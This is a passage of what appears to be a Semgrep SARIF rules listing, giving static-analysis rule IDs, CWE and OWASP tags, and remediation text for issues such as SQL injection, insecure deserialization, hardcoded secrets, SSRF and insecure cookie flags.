when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"helpUri":"https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","id":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","name":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"help":{"markdown":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod","id":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","name":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostpid-pod.hostpid-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","id":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","name":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `vm2`."},"help":{"markdown":"Make sure that unverified user data can not reach `vm2`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)\n","text":"Make sure that unverified user data can not reach `vm2`."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection","id":"javascript.express.security.express-vm2-injection.express-vm2-injection","name":"javascript.express.security.express-vm2-injection.express-vm2-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-vm2-injection.express-vm2-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"help":{"markdown":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","id":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","name":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli)\n - [https://www.rubydoc.info/gems/pg/PG/Connection](https://www.rubydoc.info/gems/pg/PG/Connection)\n","text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","id":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","name":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","id":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","name":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"help":{"markdown":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","id":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","name":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","id":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","name":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","id":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","name":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill","id":"python.lang.deserialization.tainted-dill.tainted-dill","name":"python.lang.deserialization.tainted-dill.tainted-dill","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-dill.tainted-dill"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","id":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","name":"python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-empty-password.python-neo4j-empty-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"help":{"markdown":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash)\n - [https://cwe.mitre.org/data/definitions/328.html](https://cwe.mitre.org/data/definitions/328.html)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Insecure cryptographic hash algorithms should not be used, they often have known vulnerabilities like collision. Use a more secure hash algorithm instead such as `HMACSHA256`. If you hash passwords, use a slow hash function like `Argon2` or `scrypt`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","id":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","name":"csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.hash.insecure-crypto-hash.insecure-crypto-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","id":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","name":"javascript.express.mysql.express-mysql-sqli.express-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mysql.express-mysql-sqli.express-mysql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"Secure cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","id":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","name":"php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.search-cookie-secure-false-ini-config.search-cookie-secure-false-ini-config"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sequelize-express.sequelize-express","id":"javascript.express.db.sequelize-express.sequelize-express","name":"javascript.express.db.sequelize-express.sequelize-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sequelize-express.sequelize-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"help":{"markdown":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf)\n - [https://www.cvedetails.com/cve/CVE-2020-28168/](https://www.cvedetails.com/cve/CVE-2020-28168/)\n - [https://owasp.org/www-community/attacks/Server_Side_Request_Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery)\n","text":"User-controllable argument $DATAVAL to $METHOD passed to Axios via internal handler $INNERFUNC. This could be a server-side request forgery. A user could call a restricted API or leak internal headers to an unauthorized party. Validate your user arguments against an allowlist of known URLs, or consider refactoring so that user-controlled data is not necessary."},"helpUri":"https://semgrep.dev/r/javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","id":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","name":"javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.apollo.security.apollo-axios-ssrf.apollo-axios-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict 